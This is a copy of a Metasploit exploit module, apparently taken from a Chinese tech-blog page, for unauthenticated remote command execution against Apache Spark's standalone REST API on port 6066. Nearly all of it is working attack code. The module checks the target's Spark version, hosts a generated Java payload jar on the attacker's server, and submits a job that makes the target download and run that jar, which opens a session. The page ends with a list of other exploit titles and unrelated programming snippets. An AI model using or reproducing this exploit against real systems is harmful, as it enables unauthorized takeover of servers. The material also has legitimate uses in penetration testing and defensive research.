##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})

    super(update_info(info,

      'Name'           => 'Apache Spark Unauthenticated Command Execution',

      'Description'    => %q{

          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.

          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

      },

      'License'        => MSF_LICENSE,

      'Author'         =>

        [

          'aRe00t',                            # Proof of concept

          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module

        ],

      'References'     =>

        [

          ['URL', 'https://www.jianshu.com/p/a080cb323832'],

          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']

        ],

      'Platform'       => 'java',

      'Arch'           => [ARCH_JAVA],

      'Targets'        =>

        [

          ['Automatic', {}]

        ],

      'Privileged'     => false,

      'DisclosureDate' => 'Dec 12 2017',

      'DefaultTarget'  => 0,

      'Notes'          =>

        {

          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],

          'Stability'   => [ CRASH_SAFE ],

          'Reliability' => [ REPEATABLE_SESSION]

        }

    ))

    register_options [

      Opt::RPORT(6066),

      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])

    ]

  end

  def check

    return CheckCode::Detected if get_version

    CheckCode::Unknown

  end

  def primer

    path = service.resources.keys[0]

    binding_ip = srvhost_addr

    proto = datastore['SSL'] ? 'https' : 'http'

    payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"

    send_payload(payload_uri)

  end

  def exploit

    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version

    vprint_status("Generating payload ...")

    @pl = generate_payload.encoded_jar(random:true)

    print_error("Failed to generate the payload.") unless @pl

    print_status("Starting up our web service ...")

    Timeout.timeout(datastore['HTTPDELAY']) { super }

  rescue Timeout::Error

  end

  def get_version

    @version = nil

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path),

      'method'        => 'GET'

    )

    unless res

      vprint_bad("#{peer} - No response. ")

      return false

    end

    if res.code == 401

      print_bad("#{peer} - Authentication required.")

      return false

    end

    unless res.code == 400

      return false

    end

    res_json = res.get_json_document

    @version = res_json['serverSparkVersion']

    if @version.nil?

      vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")

      return false

    end

    true

  end

  def send_payload(payload_uri)

    rand_appname   = Rex::Text.rand_text_alpha_lower(8..16)

    data =

    {

      "action"                    => "CreateSubmissionRequest",

      "clientSparkVersion"        => @version.to_s,

      "appArgs"                   => [],

      "appResource"               => payload_uri.to_s,

      "environmentVariables"      => {"SPARK_ENV_LOADED" => ""},

      "mainClass"                 => "#{@pl.substitutions["metasploit"]}.Payload",

      "sparkProperties"           =>

      {

        "spark.jars"              => payload_uri.to_s,

        "spark.driver.supervise"  => "false",

        "spark.app.name"          => rand_appname.to_s,

        "spark.eventLog.enabled"  => "true",

        "spark.submit.deployMode" => "cluster",

        "spark.master"            => "spark://#{rhost}:#{rport}"

      }

    }

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path, "/v1/submissions/create"),

      'method'        => 'POST',

      'ctype'         => 'application/json;charset=UTF-8',

      'data'          => data.to_json

    )

  end

  # Handle incoming requests

  def on_request_uri(cli, request)

    print_status("#{rhost}:#{rport} - Sending the payload to the server...")

    send_response(cli, @pl)

  end

end

[EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. [EXP]Huawei Router HG532e - Command Execution

    #!/bin/python ''' Author : Rebellion Github : @rebe11ion Twitter : @rebellion ''' import urllib2,req ...

  4. [EXP]Apache Tika-server < 1.18 - Command Injection

    #################################################################################################### ...

  5. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  7. Why Apache Spark is a Crossover Hit for Data Scientists [FWD]

    Spark is a compelling multi-purpose platform for use cases that span investigative, as well as opera ...

  8. Apache Spark源码走读之13 -- hiveql on spark实现详解

    欢迎转载,转载请注明出处,徽沪一郎 概要 在新近发布的spark 1.0中新加了sql的模块,更为引人注意的是对hive中的hiveql也提供了良好的支持,作为一个源码分析控,了解一下spark是如何 ...

  9. Apache Spark 2.2.0 中文文档

    Apache Spark 2.2.0 中文文档 - 快速入门 | ApacheCN Geekhoo 关注 2017.09.20 13:55* 字数 2062 阅读 13评论 0喜欢 1 快速入门 使用 ...

随机推荐

  1. Docker 简介,入门

    1.简介 Docker 使用 Google 公司推出的 Go 语言 进行开发实现,基于 Linux 内核的 cgroup,namespace,以及 AUFS 类的 Union FS 等技术,对进程进行 ...

  2. python 读取excel数据

    import xlrd book = xlrd.open_workbook(file_path)#打开文件 sheet = book.sheet_by_index(0) #获取第一个工作簿 print ...

  3. python--第十二天总结(Python操作 RabbitMQ、Redis、Memcache、SQLAlchemy)

    Memcached Memcached 是一个高性能的分布式内存对象缓存系统,用于动态Web应用以减轻数据库负载.它通过在内存中缓存数据和对象来减少读取数据库的次数,从而提高动态.数据库驱动网站的速度 ...

  4. linux环境:创建数据库用户,表空间,启动数据库

    1.启动数据库 首先使用oracle用户登录Linux,然后在shell命令行中执行下面的命令:第一步:打开Oracle监听(先查看状态:oracle监听是否启动:lsnrctl status)$ l ...

  5. python数据类型分类

    python数据分为可变类型和不可变类型,其中:可变类型:列表,字典不可变类型:布尔值,数字,字符串,元组 specidal:集合作为set是可变的,而作为frozenset是不可变集合 可变类型和不 ...

  6. swift hidesBottomBarWhenPushed 设置界面

    方法一(推荐):一级界面push的时候设置,子页面无需设置 let vc = JYMyCommissionController() vc.hidesBottomBarWhenPushed = true ...

  7. MESSAGE_TYPE_X in Badi:MB_DOCUMENT_UPDATE_BEFORE

    Note:385830 Instead of writing code in MB_DOCUMENT_BEFORE_UPDATE,write a check in user exit MBCF0002 ...

  8. [leetcode]243. Shortest Word Distance最短单词距离

    Given a list of words and two words word1 and word2, return the shortest distance between these two ...

  9. [leetcode]84. Largest Rectangle in Histogram直方图中的最大矩形

    Given n non-negative integers representing the histogram's bar height where the width of each bar is ...

  10. Centos7+hadoop2.7.3+jdk1.8

     修改主机名 1.       修改主机名 vi /etc/sysconfig/network ,改为 master , slave1 , slave2 2.       source /etc/sy ...